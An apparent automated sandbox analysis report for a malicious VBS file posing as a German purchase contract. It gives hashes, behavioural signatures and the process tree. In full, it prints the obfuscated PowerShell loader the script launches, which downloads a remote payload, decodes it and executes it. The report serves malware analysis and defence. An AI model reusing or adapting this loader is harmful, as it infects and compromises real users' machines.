Analysis
-
max time kernel
300s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
31/10/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
31102024_0254_Kaufvertrag-Markus-Daten.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
31102024_0254_Kaufvertrag-Markus-Daten.vbs
Resource
win10v2004-20241007-en
General
-
Target
31102024_0254_Kaufvertrag-Markus-Daten.vbs
-
Size
366KB
-
MD5
28489bd43750ec8a5017ec4bb7ca68e2
-
SHA1
90e42439a8179e56d56ffd5a2c97d7ff7f0daaca
-
SHA256
7e6c9757b46fc71815670a8056b6db913409bb571775642ef865ea633fe41cc9
-
SHA512
9470e3c42bf13f73bf43abdaacad0721a213b0e5b9376a2ce813ba39d55f8e154fe959dce2dd0cf6cb56904fbbf0003360e4f38e576cf330447cb8d0b9ff1f1c
-
SSDEEP
6144:QUad3PmM9BogPjFvVHhSZH/7h4hpAQErkpZPU/I7CIkKOmPPMWUwUhkOy96SZGFT:aQL6PErk7gvOZMmanT1A02Oh
Malware Config
Signatures
-
pid Process 2988 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2988 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target
PID 1716 wrote to memory of 2988 1716 WScript.exe 31
PID 1716 wrote to memory of 2988 1716 WScript.exe 31
PID 1716 wrote to memory of 2988 1716 WScript.exe 31
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. 
GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t 
') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-